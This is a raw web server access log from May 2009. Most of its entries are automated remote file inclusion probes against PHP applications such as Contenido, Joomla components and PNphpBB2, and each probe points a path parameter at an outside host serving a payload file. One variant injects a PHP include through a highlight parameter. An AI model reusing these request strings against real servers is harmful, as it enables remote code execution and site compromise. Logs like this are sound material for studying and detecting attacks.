211.241.40.51 - - [17/May/2009:06:12:18 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
121.254.229.131 - - [17/May/2009:06:12:39 -0400] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:06:12:55 -0400] "GET /logs/access_log.Q108121400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:06:13:40 -0400] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:06:13:40 -0400] "GET /logs/access_log.Q108112400//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:06:13:40 -0400] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 1691 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:06:13:44 -0400] "GET /logs/access_log.Q108112400//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:06:13:44 -0400] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:06:13:44 -0400] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 1691 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:06:13:50 -0400] "GET /?sourcedir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:06:14:01 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:06:14:02 -0400] "GET /logs/?sourcedir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 200 1686 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:06:14:05 -0400] "GET /logs/access_log.Q109050900//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:06:14:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.72.114 - - [17/May/2009:06:14:11 -0400] "GET /logs/access_log.Q107120300 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.143.98.5 - - [17/May/2009:06:15:00 -0400] "GET /logs/access_log.Q108112400%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.176.226.164 - - [17/May/2009:06:15:00 -0400] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.200.8.89 - - [17/May/2009:06:15:04 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.200.8.89 - - [17/May/2009:06:15:04 -0400] "GET /logs/access_log.Q109022600%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.200.8.89 - - [17/May/2009:06:15:04 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:06:15:05 -0400] "GET /logs/access_log.Q109050900%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:06:15:22 -0400] "GET /logs/access_log.Q108062600/?sourcedir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:06:15:23 -0400] "GET /logs/access_log.Q108112400%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:06:15:23 -0400] "GET /logs/access_log.Q109050900%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.200.8.89 - - [17/May/2009:06:15:27 -0400] "GET /logs/access_log.Q108101000%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.206.183.148 - - [17/May/2009:06:17:04 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.206.183.148 - - [17/May/2009:06:17:14 -0400] "GET /logs/access_log.Q108100600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.200.8.89 - - [17/May/2009:06:17:42 -0400] "GET /logs/access_log.Q109022600//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.200.8.89 - - [17/May/2009:06:18:09 -0400] "GET /logs/access_log.Q108101000//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:06:19:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.79.49 - - [17/May/2009:06:19:44 -0400] "GET /logs/access_log.Q108011900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [17/May/2009:06:21:20 -0400] "GET /logs/error_log.Q108011100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [17/May/2009:06:24:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.173.130.41 - - [17/May/2009:06:24:37 -0400] "GET /logs/access_log.Q109030700//atom.php5?page=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:06:24:37 -0400] "GET //atom.php5?page=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:06:24:37 -0400] "GET /logs//atom.php5?page=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:06:24:38 -0400] "GET /logs/access_log.Q108091700//atom.php5?page=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:06:25:25 -0400] "GET /logs/access_log.Q109050900//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.165.73.157 - - [17/May/2009:06:27:25 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [17/May/2009:06:27:36 -0400] "GET /logs/access_log.Q108100600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:06:29:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.129.119.17 - - [17/May/2009:06:29:12 -0400] "GET /logs/access_log.Q109042200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
121.173.130.41 - - [17/May/2009:06:30:04 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:06:30:04 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:06:30:05 -0400] "GET /logs/access_log.Q109022700%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
118.45.190.166 - - [17/May/2009:06:30:09 -0400] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.45.190.166 - - [17/May/2009:06:30:09 -0400] "GET /logs/access_log.Q108100700/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
118.45.190.166 - - [17/May/2009:06:30:09 -0400] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:06:30:11 -0400] "GET /logs/access_log.Q108090100%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
118.45.190.166 - - [17/May/2009:06:30:15 -0400] "GET /logs/access_log.Q108112400/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
64.12.116.80 - - [17/May/2009:06:30:32 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.29; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; InfoPath.2)"
64.12.117.9 - - [17/May/2009:06:30:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.29; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; InfoPath.2)"
64.12.117.69 - - [17/May/2009:06:30:34 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.29; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; InfoPath.2)"
64.12.116.138 - - [17/May/2009:06:30:34 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.29; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; InfoPath.2)"
124.0.55.34 - - [17/May/2009:06:30:45 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:06:30:45 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:06:30:45 -0400] "GET /logs/access_log.Q109022600//components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:06:34:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.173.130.41 - - [17/May/2009:06:34:41 -0400] "GET /logs/access_log.Q108090100//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:06:34:43 -0400] "GET /logs/access_log.Q109050300//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
118.45.190.166 - - [17/May/2009:06:35:28 -0400] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.45.190.166 - - [17/May/2009:06:35:28 -0400] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
118.45.190.166 - - [17/May/2009:06:35:28 -0400] "GET /logs/access_log.Q108100700/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
118.45.190.166 - - [17/May/2009:06:35:35 -0400] "GET /logs/access_log.Q108112400/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
91.206.183.148 - - [17/May/2009:06:36:18 -0400] "GET /logs/access_log.Q108082900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.206.183.148 - - [17/May/2009:06:36:18 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.206.183.148 - - [17/May/2009:06:36:18 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.206.183.148 - - [17/May/2009:06:37:03 -0400] "GET /logs/access_log.Q108100600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.165.73.157 - - [17/May/2009:06:37:24 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.165.73.157 - - [17/May/2009:06:37:24 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.165.73.157 - - [17/May/2009:06:37:24 -0400] "GET /logs/access_log.Q108082900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.165.73.157 - - [17/May/2009:06:38:00 -0400] "GET /logs/access_log.Q108100600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.45.190.166 - - [17/May/2009:06:38:40 -0400] "GET /logs/access_log.Q108100700%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.45.190.166 - - [17/May/2009:06:38:41 -0400] "GET /logs/access_log.Q108112400%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:06:39:08 -0400] "GET /logs/access_log.Q108091700%20%20//atom.php5?page=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:06:39:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.55.34 - - [17/May/2009:06:39:26 -0400] "GET /logs/access_log.Q109022600%20%20//components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
66.187.99.209 - - [17/May/2009:06:40:17 -0400] "GET /logs/access_log.Q108121000%20%20//include/admin.lib.inc.php?site_path=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.187.99.209 - - [17/May/2009:06:40:17 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
66.187.99.209 - - [17/May/2009:06:40:17 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:06:41:08 -0400] "GET /logs/access_log.Q108120600%20%20//components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:06:41:43 -0400] "GET /?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:06:41:46 -0400] "GET /logs/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 1686 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:06:41:46 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:06:41:57 -0400] "GET /logs/access_log.Q109042500//atom.php5?page=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:06:41:57 -0400] "GET /logs/access_log.Q108073000//atom.php5?page=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:06:42:07 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:06:43:32 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:06:43:33 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.30.79.49 - - [17/May/2009:06:43:47 -0400] "GET /logs/error_log.Q108030900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.175.180.194 - - [17/May/2009:06:44:06 -0400] "GET /errors.php?error=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
209.175.180.194 - - [17/May/2009:06:44:06 -0400] "GET /logs/errors.php?error=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
209.175.180.194 - - [17/May/2009:06:44:06 -0400] "GET /logs/error_log.Q109050600%20/errors.php?error=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
209.59.12.99 - - [17/May/2009:06:44:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.79.49 - - [17/May/2009:06:44:10 -0400] "GET /logs/error_log.Q108022200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.175.180.194 - - [17/May/2009:06:44:19 -0400] "GET /logs/error_log.Q109050600%20/errors.php?error=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
209.175.180.194 - - [17/May/2009:06:44:19 -0400] "GET /errors.php?error=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
209.175.180.194 - - [17/May/2009:06:44:19 -0400] "GET /logs/errors.php?error=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
72.3.226.56 - - [17/May/2009:06:45:27 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
72.3.226.56 - - [17/May/2009:06:45:27 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
72.3.226.56 - - [17/May/2009:06:45:27 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
72.3.226.56 - - [17/May/2009:06:45:27 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
209.175.180.194 - - [17/May/2009:06:45:49 -0400] "GET /logs/error_log.Q109050600/errors.php?error=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
209.175.180.194 - - [17/May/2009:06:46:01 -0400] "GET /logs/error_log.Q109050600/errors.php?error=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
217.147.29.190 - - [17/May/2009:06:46:18 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.147.29.190 - - [17/May/2009:06:46:19 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.147.29.190 - - [17/May/2009:06:46:21 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.147.29.190 - - [17/May/2009:06:46:25 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.147.29.190 - - [17/May/2009:06:46:33 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
94.198.214.29 - - [17/May/2009:06:46:34 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
94.198.214.29 - - [17/May/2009:06:46:35 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
94.198.214.29 - - [17/May/2009:06:46:35 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
94.198.214.29 - - [17/May/2009:06:46:35 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
94.198.214.29 - - [17/May/2009:06:46:37 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
